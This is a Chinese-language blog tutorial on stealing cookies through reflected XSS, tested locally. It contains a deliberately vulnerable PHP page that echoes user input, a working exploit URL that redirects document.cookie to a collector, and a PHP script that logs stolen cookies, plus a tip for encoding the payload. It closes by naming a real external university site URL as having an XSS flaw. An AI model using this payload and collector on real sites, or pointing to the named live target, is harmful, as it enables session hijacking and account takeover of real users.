反射型xss偷取cookie(本地验证)

原理

反射型xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。

本地验证

xss漏洞地址:http://localhost/njuptsta/xss/reflect_xss.php?name=1
黑客收集cookie地址:http://localhost/1.php?c=
构造的url exploit :

值得注意的一点:

shellcode里面cookie和原始url连接的时候,用的是+
然而在浏览器的地址栏里,+可能被解析成空格。
所以我们需要把+替换成url编码%2b
这一点值得注意,花了两个晚上最后还是求助的别人才发现的。
—2015年11月16号更新。

http://localhost/njuptsta/xss/reflect_xss.php?name=1<script>document.location="http://localhost/1.php?c="%2bdocument.cookie</script>
源码:反射型xss漏洞

将用户输入显示在当前页面,存在反射型xss漏洞。

<html>
<body>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<form method = "get" action = "reflect_xss.php">
反射型xss<br>
<input type = "text" name = "name"><br>
<input type = "submit">
</form>
<?php
echo $_GET['name'];
?>
</body>
</html>
源码:黑客收集cookie
<?php
    $cookie = $_GET['c'];
    $myfile = fopen("testfile.txt", "a");
    fwrite($myfile, "cookie:".$cookie."\n");
    fclose($myfile);
?>
反射型xss漏洞存在地址:

http://jwc.shcmusic.edu.cn/plus/Search.asp?searchtype=1&channelid=1&KeyWord=123

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值